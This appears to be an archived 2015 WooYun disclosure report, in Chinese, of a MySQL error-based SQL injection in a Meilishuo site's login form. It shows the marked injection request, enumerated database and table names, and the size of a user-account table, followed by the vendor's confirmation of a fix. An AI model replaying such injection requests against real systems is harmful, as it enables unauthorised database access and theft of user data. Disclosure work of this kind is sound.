乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-28: 细节已通知厂商并且等待厂商处理中 2015-03-28: 厂商已经确认,细节仅向厂商公开 2015-04-07: 细节向核心白帽子及相关领域专家公开 2015-04-17: 细节向普通白帽子公开 2015-04-27: 细节向实习白帽子公开 2015-05-12: 细节向公众公开
美丽说某站点MySQL报错注入
登陆处的注入点:
POST /business/index.php/login/login HTTP/1.1Content-Length: 25Content-Type: application/x-www-form-urlencodedReferer: http://higo.meilishuo.comCookie: PHPSESSID=stur0o5qtitcqgev4dpmme0rq1Host: higo.meilishuo.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*password=123456&username=*
available databases [6]:[*] hg_ejabberd[*] higo[*] information_schema[*] mysql[*] performance_schema[*] test
Database: higo[129 tables]+------------------------------------+| TBL_ADMINS || TBL_ADMIN_FUNCTION || TBL_ADMIN_FUNCTION_CAT || TBL_ADMIN_LOG || p_logs || push_log || t_country_code || t_pandora_account || t_pandora_account_bankcard || t_pandora_account_bankcard_history || t_pandora_account_connect || t_pandora_account_group || t_pandora_account_group_expansion || t_pandora_account_group_notice || t_pandora_account_invite || t_pandora_account_token || t_pandora_address || t_pandora_admin || t_pandora_bank || t_pandora_basic_events_statistics || t_pandora_basic_goods_statistics || t_pandora_bigger || t_pandora_bigger_comment || t_pandora_bill || t_pandora_bill_balance || t_pandora_bill_summary || t_pandora_bill_withdraw || t_pandora_brand || t_pandora_brand_category || t_pandora_brand_goods || t_pandora_buyer || t_pandora_buyer_connect || t_pandora_buyer_recruitment || t_pandora_buyer_session || t_pandora_buyersdb || t_pandora_category || t_pandora_category_material || t_pandora_category_size || t_pandora_color || t_pandora_country_code || t_pandora_currency || t_pandora_dimension || t_pandora_dimension_shop || t_pandora_event || t_pandora_event_goods || t_pandora_event_item || t_pandora_event_show || t_pandora_event_show_goods || t_pandora_events || t_pandora_events_expic || t_pandora_exp_platform_region || t_pandora_express_company || t_pandora_express_tracking || t_pandora_favorite || t_pandora_final_wap_statistics || t_pandora_friends || t_pandora_goods || t_pandora_goods_category || t_pandora_goods_connect || t_pandora_goods_keywords || t_pandora_goods_limitation || t_pandora_goods_price || t_pandora_goods_seckill || t_pandora_goods_sku || t_pandora_goods_tag || t_pandora_group_banner || t_pandora_group_keywords || t_pandora_home_banner || t_pandora_hot_keywords || t_pandora_hot_keywords_category || t_pandora_id_wrapper || t_pandora_image || t_pandora_invite || t_pandora_invite_simple || t_pandora_inviter || t_pandora_material || t_pandora_mls_open_token || t_pandora_order || t_pandora_order_express || t_pandora_order_item || t_pandora_order_operation || t_pandora_order_pay || t_pandora_order_pay_confirm || t_pandora_order_pay_ref || t_pandora_order_receivepush || t_pandora_order_refund || t_pandora_order_refund_pay || t_pandora_order_remark || t_pandora_order_return || t_pandora_order_return_log || t_pandora_order_revoke || t_pandora_order_summary || t_pandora_pay_receipt_record || t_pandora_product_collocation || t_pandora_product_collocation_data || t_pandora_push_device || t_pandora_report_log || t_pandora_sales_statistics || t_pandora_search_keywords || t_pandora_settlement || t_pandora_settlement_item || t_pandora_share || t_pandora_shop || t_pandora_shop_alliance || t_pandora_shop_change || t_pandora_shop_intro || t_pandora_shop_intro_ext || t_pandora_shop_intro_ref || t_pandora_shop_show || t_pandora_shop_show_items || t_pandora_show_tag || t_pandora_silence || t_pandora_sphinx_counter || t_pandora_statistics || t_pandora_subcate || t_pandora_top_keywords || t_pandora_video || t_pandora_wap_click_goods || t_pandora_wap_stat || t_pandora_wap_statistics || t_pandora_weixin_answer_rank || t_pandora_weixin_answer_recommend || t_pandora_welfare || t_pandora_welfare_log || t_pandora_xmpp_message || t_pandora_xmpp_message_type || t_pandora_xmpp_users || tbl_admin_newlogs || user_no_nick |+------------------------------------+
Database: higo+-------------------+---------+| Table | Entries |+-------------------+---------+| t_pandora_account | 151214 |+-------------------+---------+
过滤和转义
危害等级:高
漏洞Rank:15
确认时间:2015-03-28 19:03
非常感谢您对美丽说安全的关注,经验证该漏洞真实存在,已联系业务部门紧急修复。
2015-03-29:该漏洞已修复